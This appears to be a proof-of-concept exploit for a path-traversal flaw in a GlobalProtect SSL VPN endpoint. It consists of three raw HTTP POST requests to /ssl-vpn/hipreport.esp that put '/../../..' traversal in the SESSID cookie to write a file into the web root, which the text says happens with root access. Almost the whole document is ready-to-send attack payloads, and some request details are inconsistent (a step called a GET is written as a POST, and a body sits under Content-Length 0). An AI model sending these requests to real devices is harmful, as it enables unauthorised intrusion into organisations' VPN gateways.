#Steps :
#1. Check whether file (0xr2r.txt) is present on device by running below get request or We can verify same by openinig
https://domain.com/global-protect/portal/images/0xr2r.txt Url in browser if you get 404 response that means file is not present.
POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: domain.com
Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/0xr2r.txt
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
#2.now put file (0xr2r.txt) on device by running below post request . this will create file on device under given path with root assess.
POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: domain.com
Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/0xr2r.txt
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
user=0xr2r&portal=0xr2r&authcookie=284ad748-7ce2-4753-a39a-aa381b18cf70&domain=0xr2r&computer=0xr2r&client-ip=0xr2r&client-ipv6=0xr2r&md5-sum=0xr2r&gwHipReportCheck=0xr2r
#3. now again if you try to access the files you should receive 403 insted 404. this proves file (0xr2r.txt) is present on device with root access.
POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: domain.com
Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/0xr2r.txt
Content-Type: application/x-www-form-urlencoded
Content-Length: 170
user=0xr2r&portal=0xr2r&authcookie=284ad748-7ce2-4753-a39a-aa381b18cf70&domain=0xr2r&computer=0xr2r&client-ip=0xr2r&client-ipv6=0xr2r&md5-sum=0xr2r&gwHipReportCheck=0xr2r